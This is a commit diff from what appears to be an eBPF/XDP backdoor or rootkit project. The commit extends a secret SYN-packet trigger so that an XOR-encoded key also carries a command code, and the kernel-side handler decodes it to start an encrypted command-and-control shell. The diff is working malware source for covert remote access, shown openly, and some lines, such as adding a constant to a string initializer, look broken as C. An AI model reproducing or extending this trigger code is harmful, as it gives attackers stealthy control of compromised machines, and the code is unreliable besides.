Added V1 command sending via secret trigger on backdoor

src/client/client.c

@@ -204,7 +204,8 @@ void activate_command_control_shell_encrypted(char* argv){
     char section2[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
     char key1[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_1;
     char key2[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_2;
-    char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_3;
+    //K3 with command to start the encrypted connection with the backdoor
+    char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_3 + CC_PROT_K3_ENCRYPTED_SHELL_TRIGGER_V1;
     char result[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
     strncpy(section, payload, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
     for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){

src/common/c&c.h

@@ -1,6 +1,8 @@
 #ifndef __BPF_CC_H
 #define __BPF_CC_H
 
+#include "protocol.h"
+
 #define CC_PROT_SYN "CC_SYN"
 #define CC_PROT_ACK "CC_ACK"
 #define CC_PROT_MSG "CC_MSG#"

src/common/protocol.h

@@ -1,6 +1,16 @@
 #ifndef __PROTOCOL_H
 #define __PROTOCOL_H
 
+//V1
+
+//Value added to K3 to define command to send
+#define CC_PROT_K3_TOTAL_DEFINED_KEYS_V1 1
+#define CC_PROT_K3_ENCRYPTED_SHELL_TRIGGER_V1 0x00
+
+
+
+
+//V2
 struct trigger_t {
     unsigned char xor_key;
     unsigned int ip;
@@ -11,4 +21,5 @@ struct trigger_t {
 };
 
 
+
 #endif

src/ebpf/include/xdp/backdoor.h

@@ -46,20 +46,42 @@ static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 paylo
         }
     }
 
-    //S1 XOR K1 XOR S2 XOR K2 XOR K3
+    //S1 XOR K1 XOR S2 XOR K2 XOR (K3+COMMAND VALUE)
     __builtin_memcpy(section, payload+0x06, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
     __builtin_memcpy(section2, payload+0x0A, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
     __builtin_memcpy(section3, payload+0x0C, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    int correct = 1;
+    int command_received = -1;
+    for(int jj=0; jj<CC_PROT_K3_TOTAL_DEFINED_KEYS_V1; jj++){
         for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
             result3[ii] = section[ii] ^ section2[ii] ^ section3[ii];
-        if(result3[ii]!=key3[ii]){
+            if(result3[ii]!=(key3[ii] + jj)){
+                correct = 0;
+            }
+        }
+        if(correct == 1){
+            //Found valid k3 value
+            command_received = jj;
+            break;
+        }
+        
+    }
+    if(correct == 0){
         bpf_printk("FAIL CHECK 3\n");
         return XDP_PASS;
     }
-    }
 
     //If we reach this point then we received trigger packet
-    bpf_printk("Finished backdoor V1 check\n");
+    bpf_printk("Finished backdoor V1 check with success\n");
+    switch(command_received){
+        case CC_PROT_K3_ENCRYPTED_SHELL_TRIGGER_V1:
+            bpf_printk("Received request to start encrypted connection\n");
+            break;
+        default:
+            bpf_printk("Command received unknown: %d\n", command_received);
+    }
+
+
     return XDP_DROP;